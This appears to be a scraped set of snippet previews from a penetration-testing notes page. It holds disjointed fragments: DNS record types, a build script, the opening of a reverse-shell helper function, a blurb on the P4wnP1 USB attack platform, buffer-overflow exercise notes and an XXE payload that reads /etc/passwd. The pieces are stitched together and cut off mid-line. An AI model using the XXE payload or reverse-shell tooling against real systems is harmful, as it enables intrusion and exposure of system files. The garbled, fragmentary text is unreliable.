DNS Record Types:
A (Host address)
AAAA (IPv6 host address)
ALIAS (Auto resolved alias)
#!/bin/bash | |
version=4.0.2 | |
echo "execute with sudo privileges" | |
sudo true | |
echo "Install GCC" | |
sudo apt install gcc -y > /dev/null | |
echo "Install make" | |
sudo apt install make -y > /dev/null | |
echo "install postgresql server" |
function revshell() {
# $1 language
# Default tun0 1337
INF=tun0
PORT=1337
P4wnP1 is a highly customizable USB attack platform, based on a low cost Raspberry Pi Zero or Raspberry Pi Zero W (required for HID backdoor). Link to Repository
Copy image to sd card
dd if=<Source> of=<destination> bs=512 status=progress
To better grasp the understanding of Bufferoverflows I decided to make and document some exercises with this topic.
The exploit exercises are mainly from exploit-exercises.com.
Stackoverflow - When the execution stack grows beyond the memory that is reserved for it
Bufferoverflow - When a programm writes beyond the end of the memory allocated for any buffer (Heap & Stack).
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<creds>
<user>&xxe;</user>
mypass